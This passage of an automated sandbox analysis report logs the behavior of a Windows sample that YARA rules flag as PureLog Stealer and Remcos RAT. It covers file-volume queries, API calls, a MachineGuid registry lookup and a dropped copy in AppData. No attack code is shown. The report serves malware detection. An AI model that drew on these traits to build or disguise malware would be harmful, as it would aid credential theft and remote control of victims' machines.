                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeQueries volume information: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041A045 __EH_prolog,GdiplusStartup,CreateDirectoryW,Sleep,Sleep,GetLocalTime,Sleep,8_2_0041A045
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041B69E GetUserNameW,8_2_0041B69E
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0044942D _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,8_2_0044942D
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: 16_2_0041739B GetVersionExW,16_2_0041739B
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.7820000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.7820000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1995759921.0000000007820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE
